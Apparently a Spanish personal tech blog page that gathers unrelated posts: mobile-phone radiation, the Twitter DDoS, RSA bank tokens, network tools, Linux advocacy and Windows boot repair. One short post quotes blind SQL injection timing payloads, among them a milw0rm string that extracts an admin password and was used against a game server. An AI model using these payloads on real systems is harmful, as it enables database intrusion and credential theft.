Blog de Calivent

Este artciulo lo encontre por Internet es cierto que se puede hacer esto? nosotros o algunos que paramos hablando por telefono casi todo el día se imaginan como esta nuestro cerebro?.... les comparto

Siempre he pensado que la humanidad no es consciente de los riesgos a los que se expone en su vida cotidiana. La industria va por delante de la ciencia en muchos casos sobre todo en la seguridad y salud. Hace no mucho las casas tenían aislamientos de amianto que era una maravilla de la tecnica que protegía tu casa de humedad y demás adversidades, ahora si te o detectan en tu casa aparece un equipo de gente vestida como los que fueron a por ET, tratando este material cual antrax iraquí. Y así muchas cosas más, la coca-cola tenia cocaína, a los niños se les daba bebidas alcohólicas con el bocata de por la tarde- vease nuestro amigo Kinito- fumar no era nada malo para la salud así que en la tele fumaba todo cristo hasta en los noticiarios. Vete a saber dentro de varios años que veremos con asombro de nuestro pasado, uno de los más grandes candidatos, a parte de las operaciones oftalmológicas con laser, son los teléfonos móviles.

iempre ha despertado gran controversia sus emisiones de ondas tanto en los terminales como en las antenas, anque es verdad que un secador de pelo emite más radiación que un celular siempre hemos tenido la mosca detras de la oreja pensando que en 20 años nos iba a crecer un tumor del tamaño del alcatel one touch easy allí donde la mosca nos ronda.

Otra prueba más para el alarmismo es este experimento realizado por estos señores, rusos ellos, que han colocado un huevo entre dos teléfonos encendidos y en un espacio de tiempo de 65 minutos lo han cocido totalmente. Siendo la escala de tiempo la siguiente:

Y es que nunca se sabe, seguramente si estudiaramos a fondo el Tam-Tam también descubriríamos peligros para el ser humano. Así que me da igual, a por el último modelo de Nokia que haya y mientras no me cocine un huevo a mi todo tranquilo. Seguro que los responsables de compañías de telefonías diran que nompasa nada que es una estupidez. Y yo me pregunto ¿Serían capaces de comerse ese huevo con aceite y sal cual Monty Burns su pez de tres ojos? Y es que al final todo lleva a Los Simpsons.

Por cierto hay otras maneras también muy originales de cocinar un huevo sin tener que recurrir a la radiación, como por ejemplo freir un huevo con el XP.

fuente: www.microsiervos.com

encontre por ahi el Codigo Fuente del Windows Vista.. para analizar... :p

Como la comunidad tuitera y los que soportaron sus ataques de ansiedad saben, ayer Twitter se cayó más de dos horas. Un ataque similar sufrieron otras redes sociales como Facebook y Livejournal, que sí resistieron la ola y no se cayeron (aunque páginas como la de Gastón Acurio desaparecieron durante unos minutos).

¿Qué pasó? Nos ilustra Arturo Goga:

Al parecer, según nos cuenta Elinor Mills de CNET en un “mini-podcast”, el ataque habría estado dirigido hacia una sola persona, un blogger de la República de Georgia, con el nombre de usuario Cyxymu en Twitter habría sido la víctima principal. El ataque podría haberse llevado a cabo por Rusos (las IPs parecen provenir de allá), y el motivo, la crisis de Rusia – Georgia.

Si esto es cierto, no sería la primera vez que el gobierno ruso emprende un ataque DDoS contra una de las viejas repúblicas soviéticas. Hace ya dos años Rusia la emprendió contra Estonia y, de hecho, hace un año Georgia y Rusia se enfrascaron en una ciberguerra que incluso obligó al gobierno georgiano a trasladar la web de su Cancillería a blogspot.

(También cabe la posibilidad, sugerida por @hdanniel, de que sean los mismos georgianos los que iniciaron el ataque, para propagandizar su causa).

Esos son los antecedentes. Ayer fue Twitter, mañana podría ser cualquiera, por ejemplo, Perú. ¿Estamos listos para las ciberguerras? Sí, claro. Sigamos comprando tanques. Como si los fuéramos a necesitar.

Yo personalmente hago uso de las transferencias del BCP, y desde hace tres semanas ya no lo pude hacer porque requerían utilizar la clave digital, aparato especie de un reloj que te muestra tu clave y que cambia cada 5 minutos, esta metodología me parece muy buena opción más que todo por la seguridad de muchos, ya que en los últimos tiempos hubo muchos fraudes a causa de los famosos phishing,  http://es.wikipedia.org/wiki/Carding,  por este motivo también cayo  nuestro amigo Cyberalexis, por haber recibido malos consejos de hacer este tipo de trafa lastimosamente. El punto es otro. Ahora así los usuarios caigan en estas trampas de los hackers o cracker malos no podrán así tengan su número de tarjeta y su clave de internet, no podrán retirar dinero ni hacer  transferencias a sus cuentas, porque les pedirá la milagrosa “Clave Digital”. En Perú  el BCP es el primer banco  que utiliza esta tecnología de la clave digital con encriptación RSA, como lo indica el dispositivo.
La pregunta que nos hacemos ahora sobre la  clave digital es, es realmente segura?, no habrá algún hacker que pudiera descifrar nuestra clave digital, bueno a pesar de que sabemos que los bancos tienen una seguridad extrema, tampoco es la idea de alarmarlos,  pero escuchamos des este conocido hacker argentino que según sus artículos está a punto de romper la encriptación de las Claves RSA,.
Hablando de estos algoritmos el SrHugo Scoling mostró durante su presentación algunos programas muy interesantes y prometedores,  que resolvían con eficiencia encomiable, fragmentos del problema y en un tiempo muy razonable.
Hablando claro, si Scolnik tiene éxito con su aproximación al problema de la factorización entera, algo en lo que ha avanzado y mucho, se podría factorizar cualquier clave RSA, casi con independencia de su tamaño, en un tiempo polinómico razonablemente corto, usando para ello un simple ordenador de sobremesa. Se acabarían los oscuros tiempos de la fuerza bruta durante los que se llegó a factorizar el desafío RSA200, el 2 de noviembre de 2005 por Jens Franke de la Universidad de Bonn. El mismo que machacó los desafíos RSA160, RSA576 y RSA640, ganando jugosos premios en metálico con ello. Que no nos engañe el nombre RSA200, puesto que al igual que el desafío RSA160, el número hace referencia a su longitud en dígitos decimales, por lo que estamos hablando de la factorización de una clave con una impresionante longitud de 663 bits. Dicen las malas lenguas que Franke tuvo suerte con unos primos de Mersenne. Yo no lo he comprobado y seguro que los que han dicho esto son unos envidiosos de cuidado ¿no creen?. Pero no nos perdamos el preocupante hecho de que Franke considera que su límite práctico actual de factorización, usando la "Special Number Field Sieve", es una clave RSA de 1024 bits.
Si el Doctor Scolnik logra romper el desafío RSA2048 se haría acreedor de un premio de 200.000 dólares, pero al mismo tiempo, se cargaría gran parte de la criptografía de clave pública que conocemos.
Menos mal que todavía no lo ha logrado, y que por ello, alguno me puede acusar de alarmista, pero la mera posibilidad de que lo logre en un tiempo relativamente breve, me pone los pelos de punta. Si alguien me pregunta por mi impresión de todo esto, he de decir que su conferencia me pareció bastante sólida dentro de la complejidad de los conceptos empleados y las limitaciones impuestas por el tiempo de exposición. Si lo logra, ¿cuántos secretos cifrados con el GPG/PGP que circulan por el mundo podrían quedar al descubierto?, además de claves bancarias, claves simétricas intercambiadas mediante sistemas de clave pública, nuestra clave digital del banco de crédito,  tuneles ssh que se abren, VPN que ya no son tan privadas, llaves electrónicas que ya no protegen, sistemas de acceso que nos abren sus puertas de par en par, etc, etc, etc.

atte calivent

Leyendo por ahí, encontre otros metodos de inyección que a de tener mucho cuidado...
los ejemplo aquí publicados son solo con fines educativos.
“Data Mining with SQL Injection and Inference” donde expone algunas técnicas :P de tiempo de retardo:

xp_cmdshell ‘ping –n 10 127.0.0.1’ ? aplicación en pausa durante 10 segundos.

“SQL Injection Cheat Sheet” de Ronald van den Heetkamp, muestra unos trucos de inyección SQL a ciegas para MySQL, basados en Benchmark, funciones que pueden llegar a generar tiempos de retardos,

SELECT BENCHMARK(10000000,ENCODE(’abc’,'123′)); [around 5 sec]
SELECT BENCHMARK(1000000,MD5(CHAR(116))) [ around 7 sec]
Ejemplo: SELECT IF( user = ‘root’, BENCHMARK(1000000,MD5( ‘x’ )),NULL) FROM login

Esta es otra muestra de la que salio en milw0rm:

¡$sql=”F***You’),(1,2,3,4,5,(SELECT IF (ASCII (SUBSTRING(se_games.admin_pw, “.$j.”, 1)) =”.$i.”) & 1, benchmark(200000000,CHAR(0)),0) FROM se_games))/*”;

Esto lo usaron para atacar el servidor de un juego llamado Solar Empire.
Pues si, la verdad todo va evolucionando, las técnicas, herramientas, todo… por eso me llamo mucho la atención este articulo que resumí de Microsoft.

La falla de seguridad que permite a un usuario ser infectado al visitar una página web con un exploit corriendo en background recien sacaron su parche, según informa Microsoft en su sitio web. despues que miles de usuarios fueron vulnerados... hasta talvez fuiste tu..

el IE7 andaba su fallo desde mas de 2 semanas pudiendo a un atacante remoto obtener el control de nuestro equipo y hacer uso de los privilegios que se otorga para manipularlo a su gusto.

En este sentido es conveniente que todos parchen sus versiones de Internet Explorer 6, Internet Explorer 7, etc. con estos parches de seguridad. Los parches están disponibles para todas las versiones de Internet Explorer y pueden ser descargados desde el siguiente enlace.o mejor aun recomendable es usar Firefox, navegador más rapido, más seguro, y más manejable.. en realidad muchas cosas mejores...

Este es el primero de una serie de post, que en principio no serán consecutivos, en los que tratare sobre herramientas útiles para un administrador de redes. Las herramientas serán tanto para la plataforma Windows como para la plataforma Linux y algunas multiplataforma.

En este post voy hablar dos herramientas: una para Windows llamada Free IP Tools y otra multiplataforma llamada Nemesis.

Free IP Tools.
Esta aplicación es un conjunto de herramienta de red, agrupadas en una cómoda interfaz grafica.

Free IP Tools contiene además del clásico ping y traceroute las siguientes herramientas:

• PortScan es un escáner de puertos, que permite explorar la red buscando puertos abiertos. Utiliza el modo silencioso para evitar ser detectado.
• HostAlive es una herramienta para supervisar disponibilidad de un anfitrión y de los servicios en red proporcionados por el anfitrión (tal como HTTP o ftp server).
• EmailVerify comprueba si existe una dirección de correo electrónico, verificándola en el servidor correspondiente.
• SNMPAudit es un explorador avanzado del dispositivo SNMP que puede localizar rápidamente los dispositivos SNMP.
• SysFiles ofrece una manera fácil de corregir cinco ficheros del sistema que son importantes para el establecimiento de una red: servicios, protocolo, redes, hosts y lmhosts.
• IPBlackList es una utilidad que comprueba si la dirección IP o el nombre del host proporcionado está incluido en una lista negra como emisor de Spam. Algunas veces se le deniegan servicios a host por estar incluidos en estas listas.
• NBScan explorara la red buscando recursos compartidos por sistemas Windows: las carpetas, las impresoras y otros dispositivos. Este explorador de NetBIOS es muy rápido debido a la característica de la exploración paralela, así que puede explorar y enumerar todos los recursos compartidos de una red de clase C en un minuto.
• RawSocket puede crear socket de TCP y de UDP para probar y ajustar diversos servicios en red.
• Shares supervisa recursos compartidos en la computadora y monitoriza las conexiones a dichos recursos. Puede también ser utilizada para conectar recursos compartidos fácilmente.
• NSLookup es un programa, para saber si el DNS está resolviendo correctamente los nombres y las IPs.

Linux se ha caracterizado siempre por la robustez de su sistema ya que pueden pasar meses e incluso años sin la necesidad de apagar o reiniciar el equipo, también si una aplicación falla simplemente no bloquea totalmente al equipo.br

En Windows siempre hay que reiniciar cuando se cambia la configuración del sistema, se bloquea fácilmente cuando ejecuta operaciones aparentemente simples por lo que hay que reiniciar el equipo.
Aunque Linux no esta detrás de ninguna casa comercial gracias a su elevada popularidad ofrece una alta compatibilidad ofreciendo, además, actualizaciones frecuentes.

Windows al ser parte de Microsoft intenta ofrecer una gran cantidad de drivers ya que su gran poder económico hace que las empresas mismas de hardware creen sus propios drivers./ Aca le dejo mi lista de porque uso Linux y Software Libre…
No tengo ganas de esperar el reinicio de mi PC cada 2 X 3 porque se me cuelga.
No tengo ganas de instalar drivers por cada componente que le pongo a mi compu.
No tengo ganas de tener antivirus, spyware, adware etc etc.
No tengo ganas de esperar para abrir programas.
No tengo ganas de usar serials o cracks.
No tengo ganas de que la compu use mas energia gracias al sistema operativo (michosoft tiene la culpa del calentamiento global xD).
No tengo ganas de robar(legalmente) pirata (ups, usar serials o cracks es hacer eso, no sabias?)
No tengo ganas de fijarme si la actualizacion automatica que me ofrecen es o no perjudicial para mi sistema operativo.
Yo quiero elegir… que no me venga el tipo mas feo y rico del mundo y me diga -Usa Windos JuJaJu!-.
Yo quiero ser desordenado, necesito mas lugar para hacerlo, no me gusta tener un solo escritorio (uso 4 como minimo).
Yo quiero encontrar información para arreglar mis propios problemas si algo no funciona.
Yo quiero un diseño con interface moderno , atractivo y fácil de usar.
Yo quiero usar programas gratis y abiertos (Nota: Los versiones de los mismos para Windows son disponibles pero no corren tan rápidamente).
Yo quiero instalar programas en línea en vez de buscar discos de instalación que se puede perder.
Yo quiero configurar mi compu como servidor.
Yo quiero que todo sea libre
Yo quiero que mi sistema avance y crezca en cada version, y no que todos las rechacen.
Yo quiero que todo sea compatible, y no preocuparme si el programa que bajo o el componente que compro no funcione, porque no es compatible.
Yo quiero comprarme una compu celeron de 1.2 ghz con 256Mb de memoria para tener al 100% el sistema operativo mas nuevo Yo no quiero que me denuncien por piratería.

Despues de tantas luchas y pesares.:p,
me dispuse separar un tiempo y dedicarme a la programación,
claro ya desde muuuuucho tiempo no agarro mi delphi, hasta la fecha
mi favorito... pensaba desarrollar un sistema de pagos/notas etc.
pero esta vez quería progrmar en linux, pues bien como quería
utilizar el clon de delphi en Linux, pero lamentablemente no encontré
para fedora y redhat el cual utilizo. Solo para debian/ubunto, no
pude ademas este clon llamado kilyx esta descontinuado después
que Borland Creador de Delphi fue comprado por microsoft, y por
supuesto microsoft elimino de la pantalla a kilyx por supuesto, no
querría una competencia para desarrolladores libres, realmente
una pena. y por ende la ultima versión de delphi ya se parece
al .NET. Prácticamente lo mismo!,

Pues ahora viendo la situación
estoy inclinándome para usar mono develp, el cual me parece un
poco mejor

 

Retorno: Introduce el texto en el campo superior y pulsa el botón!

a veces alguien a necesitado una herramienta en linea para convertir texto a MD5 con urgencia aquí un pequeño algoritmo ejecutado :P... muy útil, por ejemplo te olvidaste el password, solución codifícalo en la BD. ups pero esta en MD5, solución tenemos para convertirlo el texto "nueva clave" y guardarlo en MD5! fin. Somos felices.

Introduje un script en Java Ajax simple simplemente eso con innerHTML listo, para experimentar, vean el código. ;)

Ofrezco un servicio gratuito de frases celebres y preguntas graciosas.

para insertarlos en su web, y pueda ver en un bloque la pregunta graciosa o frase aleatoriamente. 

Si deseas incluir una frase aleatoria en tu sitio solo agrega este codigo html donde quieres que aparezca la frase.

2100 Preguntas Graciosas
545 Frases Celebres

para Preguntas Graciosas 

<script type="text/javascript" xsrc="http://cali.perudatanet.com/randomtips.php
?tipo=comic" ></script>

para frases Celebres

<script type="text/javascript" xsrc="http://cali.perudatanet.com/randomtips.php
?tipo=frases" ></script>

para frases solo Graciosas  y Celebres

<script type="text/javascript" xsrc="http://cali.perudatanet.com/randomtips.php"
></script>

A todos los usuarios de Windows tarde o temprano les toca ver este
error. Windows no arranca, y se para en un breve mensaje, de dos
palabras fatales: Falta NTLDR.

Si se tiene un poco de habilidad, es fácil saber qué pasa y
solucionarlo. Por ejemplo, bastaría con enchufar el disco duro en otro
PC y allí copiarle los archivos NTLDR y Boot.ini correspondientes. Pero claro… ¿y si es un portátil, 
Pues nada, tiramos del CD de Windows XP… pero resulta que por alguna
razón la consola de recuperación no arranca, y sólo se ofrece la opción
de instalar Windows XP encima del que ya existe (que va a ser que no).
Bueno, siempre podemos hacer un disquete de arranque en otro ordenador,
y… ah, vaya, es un portátil. No tiene disquetera.

Sin problemas. Siguiendo las instrucciones de este artículo de la KB de Microsoft, no tenemos más que copiar los mencionados archivos NTLDR y Boot.ini en un disquete, además del Ntdetect.com, utilizando para el primero de ellos la utilidad expand (si quedan dudas, hay más detalles en el citado artículo).

Una vez copiados estos archivos en el disquete, tenemos que utilizar
el Nero. Creamos una compilación nueva, y elegimos la opción “CD-Rom
(Arranque)”. Como origen de los datos escogemos el disquete con los
archivos de antes. Aceptamos y le damos a grabar, sin hacer nada más.
El Nero copiará los archivos que hay en el disquete en los sectores
correspondientes del CD para que éste sirva como arranque.

Y ya está. Utilizamos este CD para arrancar en el ordenador con el NTLDR desaparecido, y Windows XP arrancará sin problemas. Luego no debemos olvidarnos de restaurar estos archivos, claro.

Que viene a la mente de la mayoria de las personas cuando oyen la palabra hacker? Sin duda alguna se imaginan a una persona experta en sistemas informaticos y computacion que se dedica a penetrar a sistemas informaticos sin permiso, ya sea para robar o destruir informacion o para inhabilitar el sistema entre muchas otras cosas. Para muchos pensar en hackers es pensar en criminales o personas con animos maliciosos, a otros les atrae lo que podrian lograr si tuvieran esos conocimientos, otros los admiran y desean ser como ellos porque precisamente les atrae lo que podrian hacer, pero al final, nadie pone en tela de juicio que eso es un hacker, alguien que no hace nada productivo realmente y que basicamente se dedica a entrar sin permiso a computadoras y causar daños a un sistema porque no tiene nada mejor que hacer. Pero como veremos, esto no es asi.

[...] yo no estoy de acuerdo con esa definicion o idea que se tiene acerca de los hackers, ni los verdaderos hackers estan de acuerdo con esa definicion, los hackers han estado luchando en contra de que se les etiquete de esa forma, pero lamentablemente los medios de comunicacion son muy fuertes y llaman hacker a cualquier niño de 15 años que entra a algun sistema informatico, y nadie pone en entredicho que asi es, es por todos sabido el gran poder que tienen los medios de comunicacion [...]

[...] Por lo tanto ser hacker ha quedado reducido a eso, a entrar a un sistema informatico sin autorizacion. Eso es una verdadera burla para los verdaderos hackers y es una lastima que eso signifique ahora ser hacker. [...]

[...] Los hackers saben lo que estas personas hacen y saben que perjudican mucho a la comunidad hacker con esas acciones. Ellos llaman a este tipo de personas crackers, lamers o script kiddies. Estas personas usan los conocimientos y descubrimientos de los hackers para destruir, mientras que los hackers construyen.[...]

[...] Pocos saben realmente lo que es un hacker, muchos hasta creen serlo y lo dicen por todos lados. Pero ser un hacker lleva años y años de estudio, y no el tipo de estudio al que esta acostumbrada la mayoria de las personas, los hackers dedican horas y horas diarias en leer y aprender y lo hacen de una manera exagerada, son personas sumamente perseverantes, no descansan hasta resolver algo, duran incluso dias sin dormir, es asi como se convierten en unos magos de la tecnologia. Y ese conocimiento lo usan para construir, para crear cosas utiles para las demas personas, y aparte disfrutan con ello.

Entonces la comunidad hacker sigue existiendo, con sus mismos principios y su misma forma de ser y pensar, aunque por fuera se hable de que son otra cosa y todo eso empañe la verdad.

Yo personalmente debo admitir que lo que me llamo en un principio la atencion fue el entrar a computadoras ajenas, pero afortunadamente me di cuenta lo que un hacker es realmente y ahora mi meta es llegar a ser un verdadero hacker y usar mis conocimientos en beneficio de las personas y para construir y crear cosas utiles.[...]

Viendo las tarifas de telefónica o Claro, cualquier
persona con dos dedos de frente se lo piensa dos o más veces antes de
realizar una conexión por GPRS (por WAP ya ni te cuento). Ahora mismo
se hace imposible navegar de forma asequible desde el móvil. No tengo
en cuenta el UMTS y sus tarifas planas porque todavía no hay mucho de
eso por ahí, pero seguro que algo mejora la cosa.

De todas formas, ¿no sería genial poder navegar en el móvil con la
conexión de la que disponemos en casa, para no tener que pagar por
tráfico y tener una velocidad absurdamente lenta? Si tenemos un
adaptador Bluetooth y nuestro móvil Sony Ericsson dispone de ella, es
fácil hacerlo. También se puede con un cable de datos o con un
adaptador de infrarrojos, pero la movilidad se vería reducida.

Para ello podemos seguir estos sencillos pasos (aquí usaré un Sony
Ericsson T610, la configuración en la parte del teléfono es muy similar
en el resto de modelos):

1. Bajamos e instalamos, si no la tenemos ya, la última versión del JDK de Java, actualmente la 5.0. La instalación online para Windows valdrá.

2. Hacemos lo propio con el SDK de Sony Ericsson.

3. Antes de nada, en el móvil, tenemos que ajustar las opciones correspondientes. Vamos al menú Conectar > Comunicación datos > Cuentas datos > Añadir cuenta > Datos GPRS. Ponemos un nombre cualquiera, y el APN, usuario y contraseña quedan en blanco.

4. Siguiendo la configuración en el móvil, en el menú Conectar > Opciones WAP > Perfiles WAP > Nuevo perfil creamos un perfil con cualquier nombre, pero especificando que
   conectaremos con la cuenta de datos creada en el paso anterior. Además,
   en la dirección IP ponemos la de nuestra puerta de enlace, que en este
   caso viene siendo la IP del ordenador en el que se esté ejecutando el
   proxy.

5. Abrimos el Connection Proxy (en Inicio >
   Programas > Sony Ericsson > J2ME SDK) y, con el botón de opciones
   (la rueda dentada esa), especificar el puerto COM de nuestro móvil. En
   el caso del adaptador Bluetooth, lo podremos saber en las propiedades
   del móvil, dentro de la configuración Bluetooth de Windows XP. La
   velocidad está bien en 57600.

6. Pulsamos Connect en el Connection Proxy. Si consigue conectar, abrimos el Device Explorer,
   localizado en el mismo sitio que el programa anterior. Automáticamente
   tendría que conectarse a nuestro teléfono móvil y mostrarnos las
   aplicaciones Java instaladas.

7. En el Device Explorer, vamos al menú File > Serial Networking. Acto seguido cerramos este programa y lo volvemos a abrir. Por lo visto es necesario para que la opción esa tenga efecto.

8. Nos bajamos el Opera Mini (hay otros pero este está muy bien y es gratuito) de la página que corresponda a nuestro modelo. Una vez descargado (está compuesto de un archivo JAR y otro JAD), lo instalamos con el Device Explorer, usando para ello la opción File > Install….

9. Una vez instalado el navegador, tenemos que ejecutarlo. Pero ojo: hay que ejecutarlo desde el Device Explorer, y no desde el propio teléfono, o si no no funcionará.

Para terminar, un consejo. Si no conseguís que nada de esto
funcione, reiniciad el teléfono y los programas utilizados y volved a
probar. Falla de forma bastante aleatoria.

Para ver una muestra Aquí

extraido de mdug.es